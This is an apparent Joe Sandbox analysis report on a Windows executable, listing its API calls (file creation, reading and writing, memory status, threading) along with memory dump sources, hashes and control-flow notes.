                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                  • String ID:
                                                                  • API String ID: 359084233-0
                                                                  • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                  • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                  • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                  • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                                                   Control-flow Graph

                                                                   • Entry block 401986-401995 (CreateDirectoryW); rendered graph not recovered (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                  • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                  • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                  • String ID:
                                                                  • API String ID: 635176117-0
                                                                  • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                  • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                  • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                  • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                                                   Control-flow Graph

                                                                   • Entry block 404a44-404a62 (calls 408676, ??2@YAPAXI@Z); rendered graph not recovered (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID: ExecuteFile
                                                                  • API String ID: 1033339047-323923146
                                                                  • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                  • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                  • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                  • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                                                  Control-flow Graph (function 0040ADC3; rendered as an image in the report, with blocks coloured Executed / Not Executed; the colouring is not recoverable from the text)
                                                                  Basic blocks (node id: address range, calls made in the block)
                                                                  • 1343: 40adc3-40adce
                                                                  • 1344: 40add0-40add3
                                                                  • 1345: 40ae0d-40ae0f
                                                                  • 1346: 40add5-40ade3, ??2@YAPAXI@Z
                                                                  • 1347: 40adfb
                                                                  • 1348: 40adfd-40ae0c, ??3@YAXPAX@Z
                                                                  • 1349: 40ade5-40ade7
                                                                  • 1350: 40ade9
                                                                  • 1351: 40adeb-40adf9, memmove
                                                                  Edges (from -> to)
                                                                  • 1343->1344, 1343->1345, 1344->1346, 1344->1347, 1346->1348, 1346->1349
                                                                  • 1347->1348, 1348->1345, 1349->1350, 1349->1351, 1350->1351, 1351->1348
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                  • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@memmove
                                                                  • String ID:
                                                                  • API String ID: 3828600508-0
                                                                  • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                  • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                  • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                  • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID: @
                                                                  • API String ID: 1890195054-2766056989
                                                                  • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                  • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                  • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                  • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                  APIs
                                                                    • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                    • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                    • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                    • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                  • String ID:
                                                                  • API String ID: 4269121280-0
                                                                  • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                  • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                  • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                  • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@H_prolog
                                                                  • String ID:
                                                                  • API String ID: 1329742358-0
                                                                  • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                  • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                  • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                  • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@
                                                                  • String ID:
                                                                  • API String ID: 1936579350-0
                                                                  • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                  • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                                  • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                  • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                  • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                                  • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                  • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                                  APIs
                                                                  • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                  • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AllocExceptionStringThrow
                                                                  • String ID:
                                                                  • API String ID: 3773818493-0
                                                                  • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                  • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                                  • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                  • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3168844106-0
                                                                  • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                  • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                                  • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                  • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                  • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                  • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                  • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                  APIs
                                                                  • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                  • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                  • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                  • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                  • Instruction ID: 375caa893e42e0daca7b158ffe4b4b415bc54d3572d418f3e5e61c8e5be1c541
                                                                  • Opcode Fuzzy Hash: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                  • Instruction Fuzzy Hash: 30F0F272500109BBCF029F85D901AEEBB36EB48354F00811ABA1161160D33A9961AB99
                                                                  APIs
                                                                    • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateFileHandle
                                                                  • String ID:
                                                                  • API String ID: 3498533004-0
APIs
• WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• _beginthreadex.MSVCRT ref: 00406552
  • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: ErrorLast_beginthreadex
• String ID:
• API String ID: 4034172046-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: FileTime
• String ID:
• API String ID: 1425588814-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: memmove
• String ID:
• API String ID: 2162964266-0
APIs
• _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: ExceptionThrow
• String ID:
• API String ID: 432778473-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
• ??2@YAPAXI@Z.MSVCRT(000000C8,?,0040D6BD,?,?,004149B0,?), ref: 0040D668
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
